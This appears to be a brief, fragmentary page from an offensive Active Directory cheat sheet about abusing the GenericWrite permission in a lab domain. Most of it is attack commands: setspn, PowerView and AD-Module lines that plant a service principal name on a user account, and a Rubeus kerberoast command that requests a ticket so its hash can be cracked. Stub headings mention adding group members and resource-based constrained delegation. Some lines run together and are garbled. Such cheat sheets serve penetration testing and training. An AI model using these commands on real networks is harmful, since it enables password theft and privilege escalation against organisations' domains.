GenericWrite
GenericWrite
User
# Setspn
C:\Tools>setspn -S 'http/dc01' vulnableone.local\testservice3
Checking domain DC=vulnableone,DC=local
Registering ServicePrincipalNames for CN=TestService3,OU=prodUsers,DC=vulnableone, DC=local
'http/dc01'
Updated object
# PowerView
Set-DomainObject -Identity khan.chanthou -Set @{serviceprincipalname='vulnableone/myspn1433'} -verbose
# AD-Module
Set-ADUser -Identity khan.chanthou -ServicePrincipalNames @{Add='vulnableone/myspn1433'} Request for ticket
Rubeus.exe kerberoast /user:testservice3 /nowrapCrack hash
Group
Add Member
We can verify that the command worked by using the Get-ADGroupMember cmdlet:
Computer
We can enumerate and attempted for Resourced Based Constrained Delegation.
Last updated